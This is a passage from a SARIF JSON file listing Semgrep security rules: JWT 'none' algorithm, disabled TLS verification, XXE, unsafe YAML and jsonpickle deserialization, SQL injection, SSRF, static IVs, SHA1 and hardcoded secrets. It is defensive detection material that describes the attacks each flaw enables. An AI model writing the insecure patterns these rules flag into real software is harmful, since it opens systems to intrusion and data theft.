- Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.dangerous-asyncio-exec.dangerous-asyncio-exec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"help":{"markdown":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected use of the 'none' algorithm in a JWT token. The 'none' algorithm assumes the integrity of the token has already been verified. This would allow a malicious actor to forge a JWT token that will automatically be verified. Do not explicitly use the 'none' algorithm. Instead, use an algorithm such as 'HS256'."},"helpUri":"https://semgrep.dev/r/javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","id":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","name":"javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.jsonwebtoken.security.jwt-none-alg.jwt-none-alg"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"help":{"markdown":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n","text":"Set \"rejectUnauthorized\" to false is a convenient way to resolve certificate error. But this method is unsafe because it disables the server certificate verification, making the Node app open to MITM attack. \"rejectUnauthorized\" option must be alway set to True (default value). With self -signed certificate or custom CA, use \"ca\" option to define Root Certificate. This rule checks TLS configuration only for Postgresql, MariaDB and MySQL. SQLite is not really concerned by TLS configuration. This rule could be extended for MSSQL, but the dialectOptions is specific for Tedious."},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","id":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","name":"javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-tls-disabled-cert-validation.sequelize-tls-disabled-cert-validation"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/returntocorp/java-xxe-research](https://github.com/returntocorp/java-xxe-research)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $PARSER with `$PARSER.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$PARSER.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","id":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","name":"kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities","properties":{"precision":"very-high","tags":["CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.xxe.saxbuilder-xxe-parameter-entities.saxbuilder-xxe-parameter-entities"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"help":{"markdown":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request)\n - [https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html](https://commons.apache.org/proper/commons-net/javadocs/api-3.6/org/apache/commons/net/telnet/TelnetClient.html)\n","text":"Checks for attempts to connect through telnet. This is insecure as the telnet protocol supports no encryption, and data passes through unencrypted."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","id":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","name":"problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.telnet-request.telnet-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"help":{"markdown":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n","text":"Detected a possible YAML deserialization vulnerability. `yaml.unsafe_load`, `yaml.Loader`, `yaml.CLoader`, and `yaml.UnsafeLoader` are all known to be unsafe methods of deserializing YAML. An attacker with control over the YAML input could create special YAML input that allows the attacker to run arbitrary Python code. This would allow the attacker to steal files, download and install malware, or otherwise take over the machine. Use `yaml.safe_load` or `yaml.SafeLoader` instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","id":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","name":"python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-pyyaml-load.avoid-pyyaml-load"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"help":{"markdown":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli)\n - [https://pypi.org/project/pymssql/](https://pypi.org/project/pymssql/)\n","text":"Detected SQL statement that is tainted by `event` object. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `cursor.execute('SELECT * FROM projects WHERE status = %s', 'active')`"},"helpUri":"https://semgrep.dev/r/python.aws-lambda.security.pymssql-sqli.pymssql-sqli","id":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","name":"python.aws-lambda.security.pymssql-sqli.pymssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.aws-lambda.security.pymssql-sqli.pymssql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","id":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","name":"python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pyyaml-fastapi.tainted-pyyaml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.tainted-url-host.tainted-url-host","id":"python.django.security.injection.tainted-url-host.tainted-url-host","name":"python.django.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"help":{"markdown":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Found that the setting for providing detailed exception reports in Rails is set to true. This can lead to information exposure, where sensitive system or internal information is displayed to the end user. Instead, turn this setting off."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","id":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","name":"ruby.rails.security.audit.detailed-exceptions.detailed-exceptions","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.detailed-exceptions.detailed-exceptions"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"help":{"markdown":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle)\n - [https://github.com/jsonpickle/jsonpickle#jsonpickle](https://github.com/jsonpickle/jsonpickle#jsonpickle)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"Avoid using `jsonpickle`, which is known to lead to code execution vulnerabilities. When unpickling, the serialized data could be manipulated to run arbitrary code. Instead, consider serializing the relevant data using `json` module."},"helpUri":"https://semgrep.dev/r/python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","id":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","name":"python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","LOW CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.deserialization.avoid-jsonpickle.avoid-jsonpickle"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"help":{"markdown":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode)\n - [https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96](https://github.com/we45/Vulnerable-Flask-App/blob/752ee16087c0bfb79073f68802d907569a1f0df7/app/app.py#L96)\n","text":"Detected JWT token decoded with 'verify=False'. This bypasses any integrity checks for the token which means the token could be tampered with by malicious actors. Ensure that the JWT token is verified."},"helpUri":"https://semgrep.dev/r/python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","id":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","name":"python.jwt.security.unverified-jwt-decode.unverified-jwt-decode","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.jwt.security.unverified-jwt-decode.unverified-jwt-decode"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"help":{"markdown":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"Initialization Vectors (IVs) for block ciphers should be randomly generated each time they are used. Using a static IV means the same plaintext encrypts to the same ciphertext every time, weakening the strength of the encryption."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.hardcoded-iv.hardcoded-iv","id":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","name":"swift.commoncrypto.hardcoded-iv.hardcoded-iv","properties":{"precision":"very-high","tags":["CWE-329: Not using a random initialization Vector (IV) with Cipher Block Chaining (CBC) Mode causes algorithms to be susceptible to dictionary attacks.","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.hardcoded-iv.hardcoded-iv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1)\n - [https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html](https://www.schneier.com/blog/archives/2012/10/when_will_we_se.html)\n - [https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/sha-1-collision-signals-the-end-of-the-algorithm-s-viability)\n - [http://2012.sharcs.org/slides/stevens.pdf](http://2012.sharcs.org/slides/stevens.pdf)\n - [https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html](https://pycryptodome.readthedocs.io/en/latest/src/hash/sha3_256.html)\n","text":"Detected SHA1 hash algorithm which is considered insecure. SHA1 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","id":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","name":"python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-hash-algorithms.insecure-hash-algorithm-sha1"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `evaluate` method it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","id":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","name":"javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.playwright.security.audit.playwright-evaluate-arg-injection.playwright-evaluate-arg-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"help":{"markdown":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Private Key detected. This is a sensitive credential and should not be hardcoded here. Instead, store this in a separate, private file."},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-private-key.detected-private-key","id":"generic.secrets.security.detected-private-key.detected-private-key","name":"generic.secrets.security.detected-private-key.detected-private-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-private-key.detected-private-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module 